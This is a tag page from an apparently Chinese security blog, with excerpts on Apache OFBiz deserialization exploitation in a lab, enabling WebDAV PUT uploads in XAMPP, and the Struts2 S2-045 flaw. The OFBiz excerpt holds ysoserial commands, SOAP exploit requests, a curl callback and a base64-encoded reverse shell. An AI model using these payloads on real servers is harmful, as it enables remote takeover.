Tag:apache

Tag (apache)'s result:

apache ofbiz 两个反序列化漏洞重现(CVE-2021-26295和CVE-2020-9496)

0x00 概述 OFBiz是基于Java的Web框架,包括实体引擎,服务引擎和基于小部件的UI,是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。 CVE-2021-26295:RMI反序列化命令执行,未经身份验证的攻击者可以成功接管Apache OFBiz。 CVE-2020-9496:xmlrpc未授权反序列化导致RCE。   0x01 影响范围 CVE-2021-26295:Apache OFBiz < 17.12.06 CVE-2020-9496:Apache OFBiz < 17.12.04   0x02 漏洞重现 app=”Apache_OFBiz” CVE-2021-26295 docker run -d -p 8000:8080 -p 8443:8443  opensourceknight/ofbiz   POST /webtools/control/SOAPService HTTP/1.1 …… Content-Type: application/xml   <soapenv:Envelope xmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/”> <soapenv:Header/> <soapenv:Body> <ser> <map-HashMap> <map-Entry> <map-Key> <cus-obj>ace……e78</cus-obj> </map-Key> <map-Value> <std-String value=”http://xxxxxx.dnslog.cn”/> </map-Value> </map-Entry> </map-HashMap> </ser> </soapenv:Body> </soapenv:Envelope> 中间的cus-obj 直接用: java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar URLDNS http://ofbiztest.xxxxxx.dnslog.cn > ofbizhex.out 然后转成hex 即可: import binascii filename = ‘ofbizhex.out’ with open(filename, ‘rb’) as f: content = f.read() print(binascii.hexlify(content))   RCE java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar ROME ‘curl http://192.168.56.200:7766/testofbizrce’ > b2h10.txt   POST /webtools/control/SOAPService HTTP/1.1 …… Content-Type: application/xml   <soapenv:Envelope xmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:ser=”http://ofbiz.apache.org/service/”> <soapenv:Header/> <soapenv:Body> <ser> <map-Map> <map-Entry> <map-Key> <cus-obj>aced00057……00678</cus-obj> </map-Key> <map-Value> <std-String/> </map-Value> </map-Entry> </map-Map> </ser> </soapenv:Body> </soapenv:Envelope>     反弹shell java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar ROME ‘bash -c {echo,YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTkyLjE2OC41Ni4yMDAvNzc2NiA8JjEn}|{base64,-d}|{bash,-i}’ > b2h11.txt   POST /webtools/control/SOAPService HTTP/1.1 …… Content-Type: application/xml   <soapenv:Envelope xmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:ser=”http://ofbiz.apache.org/service/”> <soapenv:Header/> <soapenv:Body> <ser> <map-Map> <map-Entry> <map-Key> <cus-obj>aced00057……000678</cus-obj> </map-Key> <map-Value> <std-String/> </map-Value> </map-Entry> </map-Map> </ser> </soapenv:Body> </soapenv:Envelope>   CVE-2020-9496 环境:https://vulhub.org/#/environments/ofbiz/CVE-2020-9496/ https://192.168.56.200:8443/myportal/control/main https://192.168.56.200:8443/webtools/control/xmlrpc   java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar CommonsBeanutils1 “touch /tmp/success”……

apache开启对put请求的支持

0x00 前言: 最近整理了一下各种http请求,发现xampp里apache默认没支持put请求,所以有此文记录配置apache开启对put请求的支持。 0x01 环境: win7+xampp 0x02 步骤: 1.在httpd.conf中把下面两行的注释去掉(先看看有没有这两个模块,应该有的) LoadModule dav_module modules/mod_dav.so LoadModule dav_fs_module modules/mod_dav_fs.so 2.修改httpd.conf某段如下 DocumentRoot “C:/xampp/htdocs” <Directory “C:/xampp/htdocs”> # # Possible values for the Options directive are “None”, “All”, # or any combination of: #   Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews # # Note that “MultiViews” must be named *explicitly* — “Options All” # doesn’t give it to you. # # The Options directive is both complicated and important.  Please see # http://httpd.apache.org/docs/2.4/mod/core.html#options # for more information. # Options Indexes FollowSymLinks Includes ExecCGI# # AllowOverride controls what directives may be placed in .htaccess files. # It can be “All”, “None”, or any combination of the keywords: #   AllowOverride FileInfo AuthConfig Limit # #AllowOverride All# # Controls who can get stuff from this server. # Require all granted Dav On AllowOverride None Options All Order allow,deny Allow from all </Directory> 3.解决webdav锁的问题 新建文件DavLock,在httpd.conf中新增一行如下(路径写对应的DavLock文件所在路径) DavLockDB  C:/xampp/htdocs/DavLock 0x03 效果: target url: 192.168.0.101 http method: put upload file name: 111.png local file path: /root/Pictures/1.png <!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”> <html><head> <title>201 Created</title>……

Apache Struts2 RCE bug (S2-045,CVE-2017-5638)

1.概述: 2017.03.07,网上曝出了apache struts2的RCE漏洞,编号CVE-2017-5638。 安恒信息安全研究院WEBIN实验室高级安全研究员nike.zheng发现著名J2EE框架——Struts2存在远程代码执行的严重漏洞。 2.什么是apache、struts? Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架。众所周知的SSH框架就是用了struts2。 3.漏洞原因: Struts使用的Jakarta解析文件上传请求出现异常时,对异常的处理不当,当远程攻击者构造恶意的Content-Type(注入ognl语言),可能导致RCE。 官方链接:https://cwiki.apache.org/confluence/display/WW/S2-045 4.影响版本: Struts 2.3.5 – Struts 2.3.31 Struts 2.5 – Struts 2.5.10 基本通杀了! 5.修复方案: 5.1:升级到Apache Struts 2.3.32或2.5.10.1版。 5.2:切换到不同的实现文件上传Multipart解析器(有3种可以选择,默认开启jakarta,此漏洞危害甚广!) 5.3:临时解决方案:删除commons-fileupload-x.x.x.jar文件(会造成上传功能不可用)。